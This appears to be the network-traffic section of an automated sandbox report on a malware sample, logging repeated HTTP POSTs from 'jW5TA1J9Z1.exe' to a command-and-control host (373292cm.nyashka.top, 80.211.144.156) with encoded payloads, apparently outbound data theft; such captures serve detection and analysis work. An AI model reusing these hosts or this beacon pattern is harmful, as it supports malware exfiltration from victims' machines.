                                                                    Data Raw: 09 1d 26 56 28 35 03 00 27 28 33 0c 30 20 25 0d 2a 3d 38 01 3e 03 2a 04 30 01 25 17 25 3e 3c 50 33 3b 2a 03 3c 00 08 19 24 3f 0d 1e 2d 24 2b 5d 0c 13 22 15 34 04 35 04 24 3c 2c 5c 3e 2b 2f 17 21 3c 2a 59 2b 3a 3d 55 2b 01 38 58 3c 29 0d 59 3f 2a 2a 55 2e 28 04 02 2e 20 08 1e 34 14 2b 52 0d 11 24 10 2b 3d 25 1d 3d 2e 1a 01 22 06 27 58 33 3d 07 09 25 1c 2a 52 27 07 0e 1f 32 21 35 1f 33 57 29 12 25 3b 21 02 25 2c 3d 56 21 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &V(5'(30 %*=8>*0%%><P3;*<$?-$+]"45$<,\>+/!<*Y+:=U+8X<)Y?**U.(. 4+R$+=%=."'X3=%*R'2!53W)%;!%,=V!#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.74972780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:14.087327957 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:14.443074942 CEST2544OUTData Raw: 5f 5c 5c 52 51 40 54 59 5b 5f 5a 51 59 50 58 55 57 50 5d 59 57 5e 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\RQ@TY[_ZQYPXUWP]YW^S\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X/?6>7 !+-0?&<-[ 3#1?779_;>&F$.Y/
                                                                    Aug 21, 2024 10:03:14.767332077 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:14.897525072 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.74972880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:15.808602095 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:16.161849022 CEST2544OUTData Raw: 5a 50 5c 57 54 46 54 5d 5b 5f 5a 51 59 50 58 52 57 5b 5d 53 57 51 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\WTFT][_ZQYPXRW[]SWQS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.],+53 6==\<6+;[##W/*)7]40!;>&F$.Y/
                                                                    Aug 21, 2024 10:03:16.510523081 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:16.645663023 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.74973080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:16.543946028 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.74973380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:16.988464117 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:17.333632946 CEST2544OUTData Raw: 5f 57 5c 53 51 47 51 5e 5b 5f 5a 51 59 56 58 53 57 5d 5d 59 57 5d 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\SQGQ^[_ZQYVXSW]]YW]SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y,U3A#-'70!Z=(=9([77 #2'(9'\"#>8&F$.Y/!
                                                                    Aug 21, 2024 10:03:17.670511961 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:17.912044048 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.74973580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:18.970951080 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:19.318097115 CEST2536OUTData Raw: 5f 5c 59 57 54 49 54 5a 5b 5f 5a 51 59 57 58 52 57 5c 5d 52 57 5a 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YWTITZ[_ZQYWXRW\]RWZS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.80 #-;#![*-(^<!Z).+Z#<R4!3?75],&F$.Y/1
                                                                    Aug 21, 2024 10:03:19.654755116 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:19.853583097 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.74973680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:20.355128050 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:20.708616018 CEST2544OUTData Raw: 5a 57 59 55 54 43 51 5c 5b 5f 5a 51 59 53 58 5e 57 51 5d 5b 57 5d 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZWYUTCQ\[_ZQYSX^WQ][W]SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._/3?B#=Y !>-4X?>_+ ,7W$P<#\4=;>&F$.Y/5
                                                                    Aug 21, 2024 10:03:21.048686028 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:21.249675989 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.74973880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:21.751533985 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:22.099339008 CEST2544OUTData Raw: 5f 56 5c 5f 51 42 54 5f 5b 5f 5a 51 59 52 58 54 57 5e 5d 58 57 5c 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _V\_QBT_[_ZQYRXTW^]XW\SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-8A6> " :*,+=:([?"<<7$R*9;\#0Y8&F$.Y/1
                                                                    Aug 21, 2024 10:03:22.420949936 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:22.638360023 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.74973980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:21.806905031 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:22.161735058 CEST1844OUTData Raw: 5a 55 5c 50 51 45 54 5e 5b 5f 5a 51 59 56 58 5f 57 59 5d 52 57 5c 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZU\PQET^[_ZQYVX_WY]RW\SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.],!+" 6)=/(]+[$#/0!13?+ 0X/&F$.Y/!
                                                                    Aug 21, 2024 10:03:22.500739098 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:22.728085041 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0e 29 43 2a 1f 26 38 30 19 27 1d 2a 53 2b 3e 23 13 2a 3d 26 05 33 38 39 58 31 10 05 08 27 38 3d 5d 3f 58 3a 53 26 2c 2f 5c 2d 24 2b 5d 0c 13 22 5e 37 14 35 05 25 02 01 03 2a 16 02 04 22 05 36 13 3f 03 3e 0a 3f 3f 28 5b 28 00 3f 11 28 2a 00 1c 2f 06 04 06 2e 20 22 13 23 2e 2b 52 0d 11 24 1d 3f 03 3d 1f 3d 3e 33 5e 35 5e 24 02 30 04 26 50 25 0c 00 55 27 07 2c 10 25 0b 39 55 27 22 3d 55 32 05 31 06 31 06 36 0f 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %)C*&80'*S+>#*=&389X1'8=]?X:S&,/\-$+]"^75%*"6?>??([(?(*/. "#.+R$?==>3^5^$0&P%U',%9U'"=U211662#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.74974080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:23.403815985 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:23.755608082 CEST2536OUTData Raw: 5f 50 59 54 51 44 54 51 5b 5f 5a 51 59 57 58 50 57 50 5d 5d 57 5c 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _PYTQDTQ[_ZQYWXPWP]]W\S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/0<#-\ 02>(_<?'\ <P41 +*473!X;.&F$.Y/
                                                                    Aug 21, 2024 10:03:24.097390890 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:24.233509064 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.74974280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:24.873002052 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:25.226041079 CEST2544OUTData Raw: 5f 53 5c 54 54 42 54 5d 5b 5f 5a 51 59 54 58 5e 57 58 5d 5d 57 5c 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _S\TTBT][_ZQYTX^WX]]W\S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,#$67">>,]+!_?4R#W<(9+7 1;&F$.Y/)
                                                                    Aug 21, 2024 10:03:25.547121048 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:25.766395092 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.74974480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:26.258500099 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:26.614903927 CEST2544OUTData Raw: 5f 53 5c 54 54 45 54 5a 5b 5f 5a 51 59 55 58 56 57 59 5d 5d 57 5e 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _S\TTETZ[_ZQYUXVWY]]W^SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,3'D!.77#)+-,(>)+-?#<(!!+ #0!X/.&F$.Y/-
                                                                    Aug 21, 2024 10:03:26.948158979 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:27.084918976 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.74974580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:27.304879904 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:27.661874056 CEST2544OUTData Raw: 5f 5d 5c 54 54 41 54 5a 5b 5f 5a 51 59 5f 58 50 57 5d 5d 5a 57 5c 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\TTATZ[_ZQY_XPW]]ZW\STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\80#">'#]*-4<9)=8 /!!'<0 0;.&F$.Y/


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.74974780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:27.766567945 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:28.116282940 CEST1868OUTData Raw: 5a 56 5c 54 54 44 54 58 5b 5f 5a 51 59 51 58 55 57 5f 5d 52 57 51 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\TTDTX[_ZQYQXUW_]RWQS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/3#!"0!Z+><+>%Z?\4 #W$Q<' ,.&F$.Y/=
                                                                    Aug 21, 2024 10:03:28.437407017 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:28.645632982 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0f 2a 36 35 00 25 2b 0e 52 30 0a 26 1e 29 03 09 58 2b 3d 2a 06 30 06 26 05 27 3e 3f 09 27 2b 32 01 3c 00 0b 0f 26 2f 3f 5d 2d 1e 2b 5d 0c 13 22 16 34 29 3a 58 25 2c 2c 58 2a 28 23 5d 22 3c 08 10 2b 2a 26 0c 3c 3f 3b 03 28 07 2b 1e 3f 2a 0b 0f 38 16 3d 5c 3a 0e 35 0d 23 04 2b 52 0d 11 27 0a 2b 03 2d 1f 3e 3e 2b 58 21 16 24 03 26 3d 08 55 25 1c 0c 52 33 3a 20 1f 31 54 3d 12 27 22 29 1d 26 15 0c 13 25 11 0f 1c 23 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %*65%+R0&)X+=*0&'>?'+2<&/?]-+]"4):X%,,X*(#]"<+*&<?;(+?*8=\:5#+R'+->>+X!$&=U%R3: 1T='")&%#"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.74974880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:28.151470900 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:28.506571054 CEST2544OUTData Raw: 5a 51 5c 56 51 44 51 5a 5b 5f 5a 51 59 52 58 52 57 5c 5d 5b 57 50 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
